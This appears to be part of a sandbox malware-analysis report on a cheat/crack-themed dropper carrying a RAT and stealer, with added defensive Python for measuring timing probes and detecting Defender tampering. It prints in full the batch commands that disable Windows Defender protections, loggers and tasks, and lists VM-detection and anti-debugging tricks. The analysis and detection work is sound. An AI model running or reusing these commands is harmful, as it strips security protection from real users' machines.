Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr Binary or memory string: vboxtray
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vboxservice
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr Binary or memory string: qemu-ga
Source: wKj1CBkbos.exe, 00000000.00000003.2138916990.0000000001432000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmwareuser
Source: wKj1CBkbos.exe, 52cheatand52rat.exe.0.dr Binary or memory string: vmusrvc
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmwareservice+discordtokenprotector
Source: Lunch LaCheatV2.exe, 00000006.00000002.2266173953.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\-
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmsrvc
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmtoolsd
Source: 52cheatand52rat.exe.0.dr Binary or memory string: vmwaretray
Source: 52cheatand52rat.exe, 00000002.00000002.2211105110.000001BC043E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmwareservice
Source: 52cheatand52rat.exe, 00000002.00000002.2202108160.000001BC0264E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Process information queried: ProcessInformation Jump to behavior
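The "RDTSC instruction interceptor" entries above each show a pair of rdtsc reads with a handful of mutated filler instructions between them: the code compares the two counter values and treats a large gap as a sign of a hypervisor exit, single-stepping or instrumentation (the "RDTSC with Trap Flag" entries are the same probe caught by the trap-flag variant of the check). The parser below is an added example written for this page, not part of the sandbox or the sample; it reads the report lines above (copied in as constructed input) and measures each probe window: how many bytes and instructions separate the two reads and whether a call or jmp breaks the straight line. It assumes the line format exactly as printed above. The three short probes come out as 6 to 19 byte windows with 3 to 7 filler instructions; the F79280 probe is routed through a call and a jmp.

```python
"""Measure the rdtsc timing-probe windows reported for Lunch LaCheatV2.exe (added example)."""
import re
from dataclasses import dataclass

# Mnemonics that move execution away from straight-line code between the two reads
CONTROL_FLOW = {"call", "jmp", "ret", "jz", "jnz", "je", "jne", "ja", "jb", "jae", "jbe",
                "jg", "jl", "jge", "jle", "js", "jns", "jo", "jno", "jc", "jnc"}

# Report line format as printed by the sandbox (assumed fixed)
_LINE_RE = re.compile(r"First address: (?P<first>[0-9A-Fa-f]+) second address: "
                      r"(?P<second>[0-9A-Fa-f]+) instructions: (?P<body>.+)$")
_INSN_RE = re.compile(r"0x(?P<off>[0-9A-Fa-f]{8}) (?P<text>.+?)(?= 0x[0-9A-Fa-f]{8} |$)")


@dataclass(frozen=True)
class RdtscProbe:
    first: int
    second: int
    instructions: tuple  # (offset relative to first rdtsc, disassembly text)

    @property
    def span_bytes(self) -> int:
        return self.second - self.first

    @property
    def filler(self) -> list:
        """Instructions between the two rdtsc reads."""
        return [text for _, text in self.instructions[1:-1]]

    @property
    def has_control_flow(self) -> bool:
        return any(text.split()[0].lower() in CONTROL_FLOW for text in self.filler)

    @property
    def is_linear(self) -> bool:
        """No call/jmp between the reads and the second rdtsc lies exactly at the end of the listed bytes."""
        return not self.has_control_flow and self.instructions[-1][0] == self.span_bytes


def parse_probe(line: str):
    """Return an RdtscProbe for an interceptor line, or None for lines of another kind."""
    m = _LINE_RE.search(line)
    if not m:
        return None
    insns = tuple((int(i.group("off"), 16), i.group("text").strip())
                  for i in _INSN_RE.finditer(m.group("body")))
    if len(insns) < 2 or insns[0][1] != "rdtsc" or insns[-1][1] != "rdtsc":
        return None
    return RdtscProbe(int(m.group("first"), 16), int(m.group("second"), 16), insns)


def summarize(lines) -> list:
    """One dict per rdtsc pair: where it sits, how wide the window is, and whether it is one basic block."""
    out = []
    for line in lines:
        p = parse_probe(line)
        if p is None:
            continue
        out.append({"first": f"{p.first:X}", "span_bytes": p.span_bytes,
                    "filler_insns": len(p.filler), "linear": p.is_linear})
    return out


# Constructed input: interceptor lines copied verbatim from this report (last one is the trap-flag variant)
REPORT_LINES = [
    r"Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: 1ACE14C second address: 1ACE156 instructions: 0x00000000 rdtsc 0x00000002 sub cl, FFFFFF93h 0x00000005 not dx 0x00000008 not cl 0x0000000a rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: FCCA9E second address: FCCAA4 instructions: 0x00000000 rdtsc 0x00000002 bswap ebp 0x00000004 pop edi 0x00000005 lahf 0x00000006 rdtsc",
    r"Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: FA93AB second address: FA93BE instructions: 0x00000000 rdtsc 0x00000002 sub dx, 35C4h 0x00000007 xor cl, FFFFFFD9h 0x0000000a cmc 0x0000000b sub cl, 00000014h 0x0000000e bswap eax 0x00000010 cwde 0x00000011 not cl 0x00000013 rdtsc",
    (r"Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe RDTSC instruction interceptor: First address: F79280 second address: 1B3CCA7 instructions: "
     r"0x00000000 rdtsc 0x00000002 nop 0x00000003 push 04DA974Eh 0x00000008 call 00007F8F9CE7A99Fh 0x0000000d push ebx 0x0000000e not bl 0x00000010 seto bh "
     r"0x00000013 push edx 0x00000014 cwd 0x00000016 push eax 0x00000017 push esi 0x00000018 cmovnb si, bp 0x0000001c pushfd 0x0000001d cwde 0x0000001e cmovns esi, ebx "
     r"0x00000021 cdq 0x00000022 push ebp 0x00000023 xchg esi, esi 0x00000025 push ecx 0x00000026 dec cl 0x00000028 not eax 0x0000002a push edi 0x0000002b inc bl "
     r"0x0000002d mov ecx, 00000000h 0x00000032 cdq 0x00000033 cwde 0x00000034 push ecx 0x00000035 mov dx, bp 0x00000038 lahf 0x00000039 cbw 0x0000003b mov edi, dword ptr [esp+28h] "
     r"0x0000003f setns bh 0x00000042 cmovns dx, bp 0x00000046 inc esi 0x00000047 inc edi 0x00000048 ror ebp, FFFFFF84h 0x0000004b xor edi, 352C7E3Bh 0x00000051 or bp, ax "
     r"0x00000054 shld ebp, ecx, 000000DBh 0x00000058 neg edi 0x0000005a bt ebx, ebp 0x0000005d btc ax, FFDCh 0x00000062 lea edi, dword ptr [edi+32E32BBDh] 0x00000068 and bh, dl "
     r"0x0000006a shld eax, ecx, 0000003Bh 0x0000006e lea edi, dword ptr [edi+ecx] 0x00000071 jmp 00007F8F9DA92C7Ah 0x00000076 mov ebp, esp 0x00000078 rdtsc"),
    r"Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Special instruction interceptor: First address: F79280 instructions rdtsc caused by: RDTSC with Trap Flag (TF)",
]

if __name__ == "__main__":
    for entry in summarize(REPORT_LINES):
        print(entry)
```

The window size is the number an analyst needs when tuning the sandbox: whether rdtsc traps to the hypervisor (the VT-x "RDTSC exiting" control) or runs natively with TSC offsetting decides how much latency a probe of only 6 to 19 bytes can observe, and a probe that detours through a call and a jmp is also measuring the cost of whatever sits at those targets.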

Anti Debugging

Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe System information queried: KernelDebuggerInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process queried: DebugObjectHandle Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\reg.exe Registry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware Jump to behavior
Source: C:\Windows\SysWOW64\reg.exe Registry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender DisableAntiSpyware
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe "C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe" Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe "C:\Users\user\AppData\Local\Temp\Primordial Crack.exe" Jump to behavior
Source: C:\Users\user\Desktop\wKj1CBkbos.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe "C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Primordial Crack.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\windows defender.bat" " Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Lunch LaCheatV2.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Mpuser" /v "MpEnablePus" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Queries volume information: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\52cheatand52rat.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiSpyware 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiVirus 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser Registry value created: MpEnablePus 0 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableBehaviorMonitoring 1 Jump to behavior
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiSpyware 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Registry value created: DisableAntiVirus 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableOnAccessProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Mpuser Registry value created: MpEnablePus 0
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableBehaviorMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableScanOnRealtimeEnable 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting Registry value created: DisableEnhancedNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet Registry value created: DisableBlockAtFirstSeen 1
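The windows defender.bat run recorded above (reg delete of the Windows Defender policy key, a series of reg add writes under it, the Defender ETW autologger Start=0 writes, and two schtasks /Change ... /Disable calls against Defender and Exploit Guard tasks) is the kind of sequence a process-creation rule should catch regardless of which file spawned it. The detector below is an added example for this page, not the sandbox's own signature logic and not code from the sample. It classifies raw command lines as recorded by Sysmon Event ID 1 or Security 4688 with command-line auditing (the event source is an assumption); the sample input is constructed from command lines listed in this report plus two benign lines. Two caveats a practitioner will want: the HKLM writes succeed only from an elevated process (the "Registry value created" entries above show they did here), and on current Windows 10/11 builds Defender ignores the DisableAntiSpyware policy and Tamper Protection blocks the Real-Time Protection values, so the rule is about intent and should fire even when the tampering fails.

```python
"""Flag Defender-tampering command lines of the kind logged in this report (added example)."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Registry and scheduled-task locations the batch file touches, lower-cased for matching
DEFENDER_POLICY_KEY = "hklm\\software\\policies\\microsoft\\windows defender"
DEFENDER_LOGGER_PREFIX = "hklm\\system\\currentcontrolset\\control\\wmi\\autologger\\defender"
DEFENDER_TASK_PREFIXES = ("microsoft\\windows\\windows defender\\", "microsoft\\windows\\exploitguard\\")

_TOKEN_RE = re.compile(r'"[^"]*"|\S+')


@dataclass(frozen=True)
class Finding:
    technique: str      # ATT&CK T1562.001 sub-behaviour, named for the rule that would carry it
    detail: str
    command_line: str


def split_windows_cmdline(cmd: str) -> list:
    """Split the way reg.exe/schtasks.exe see their arguments: quoted runs stay whole, quotes dropped."""
    return [t[1:-1] if t.startswith('"') and t.endswith('"') else t for t in _TOKEN_RE.findall(cmd)]


def _switch_value(tokens: list, switch: str) -> Optional[str]:
    low = [t.lower() for t in tokens]
    if switch in low and low.index(switch) + 1 < len(tokens):
        return tokens[low.index(switch) + 1]
    return None


def _under(key: str, root: str) -> bool:
    return key == root or key.startswith(root + "\\")


def analyze_command_line(cmd: str) -> Optional[Finding]:
    tokens = split_windows_cmdline(cmd)
    if not tokens:
        return None
    image = tokens[0].lower().rsplit("\\", 1)[-1].removesuffix(".exe")
    if image == "reg" and len(tokens) >= 3:
        verb, key = tokens[1].lower(), tokens[2].lower()
        value = _switch_value(tokens, "/v") or ""
        data = _switch_value(tokens, "/d") or ""
        if verb == "delete" and _under(key, DEFENDER_POLICY_KEY):
            return Finding("defender_policy_key_deleted", key if not value else f"{key}:{value}", cmd)
        if verb == "add" and _under(key, DEFENDER_POLICY_KEY):
            subkey = key[len(DEFENDER_POLICY_KEY):].lstrip("\\") or "(root)"
            return Finding("defender_policy_set", f"{subkey}:{value}={data}", cmd)
        if verb == "add" and key.startswith(DEFENDER_LOGGER_PREFIX) and value.lower() == "start" and data == "0":
            return Finding("defender_etw_logger_disabled", key.rsplit("\\", 1)[-1], cmd)
    elif image == "schtasks":
        switches = {t.lower() for t in tokens}
        task = (_switch_value(tokens, "/tn") or "").lower()
        if "/change" in switches and "/disable" in switches and task.startswith(DEFENDER_TASK_PREFIXES):
            return Finding("defender_scheduled_task_disabled", task, cmd)
    return None


def scan(command_lines) -> list:
    return [f for f in (analyze_command_line(c) for c in command_lines) if f is not None]


def technique_counts(findings) -> dict:
    return dict(Counter(f.technique for f in findings))


# Constructed sample: command lines copied from this report's process tree, plus two benign ones
SAMPLE_EVENTS = [
    'reg delete "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /f',
    'reg add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    'reg add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f',
    'reg add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender\\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f',
    'reg add "HKLM\\System\\CurrentControlSet\\Control\\WMI\\Autologger\\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f',
    'schtasks /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Verification" /Disable',
    'schtasks /Change /TN "Microsoft\\Windows\\ExploitGuard\\ExploitGuard MDM policy Refresh" /Disable',
    'reg query "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"',                                  # benign
    'schtasks /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Verification" /Enable',   # benign
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.technique:34} {f.detail}")
    print(technique_counts(scan(SAMPLE_EVENTS)))
```

Matching on the parsed key path rather than on substrings keeps the rule from firing on a `reg query` of the same hive, and keying the schtasks check on both /Change and /Disable avoids flagging the /Enable repair an administrator runs afterwards.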

Stealing of Sensitive Information

Source: Yara match File source: wKj1CBkbos.exe, type: SAMPLE
Source: Yara match File source: 2.0.52cheatand52rat.exe.1bc02440000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.wKj1CBkbos.exe.13e55f0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.wKj1CBkbos.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000000.2138750584.000001BC02442000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2138916990.00000000013AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2133151338.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
